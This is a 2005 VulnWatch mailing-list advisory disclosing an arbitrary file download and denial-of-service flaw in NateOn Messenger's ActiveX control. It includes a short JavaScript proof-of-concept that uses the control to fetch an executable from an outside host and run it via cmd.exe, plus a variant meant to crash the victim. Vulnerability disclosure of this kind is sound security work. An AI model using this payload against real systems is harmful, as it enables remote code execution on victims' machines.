[VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS

From: saintlinu (saintlinu@private)
Date: Wed Sep 28 2005 - 20:36:27 PDT


Title:             Arbitrary File Download by NateOn Messagener's ActiveX
and DoS

Discoverer:        PARK, GYU TAE (saintlinu@private)

Advisory No.:      NRVA05-08

Critical:          Moderately Critical

Impact:            Arbitrary file download by NateOn Messagener's ActiveX
and DoS

Where:             From remote

Operating System:  Windows Only

Solution:          unpatch yet

Workaround:        N / A

 

Notice:            09. 17. 2005 Initiate notified

                   09. 23. 2005 2nd notified

                   09. 27. 2005 3rd notified

                   09. 29. 2005 Vendor didn't response. Disclosure
vulnerability

 

Description: 

The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on

 

If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX

 

and there is another vulnerability like Buffer Overflow

 

See following detail describe:

 

NOT INCLUDED HERE BUT A PIECE OF CODE

 

<--snip-->

 

             i = GotNate.IsNateonInstall();

             

             if( i == 1 ) {

                           alert('NateOn Messenger already installed. Do
Attack ...');

                           // if you want to second order attack then try

                           i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');

                           

                           // if you want to crash to victim system the try

                           i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');

             } else {

                           alert('NateOn Messenger NOT Installed');

             }

 

</--snip-->





	

	
		
________________________________________________________
¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr) 
ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com) 
´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)



This archive was generated by hypermail 2.1.3 : Thu Sep 29 2005 - 08:54:29 PDT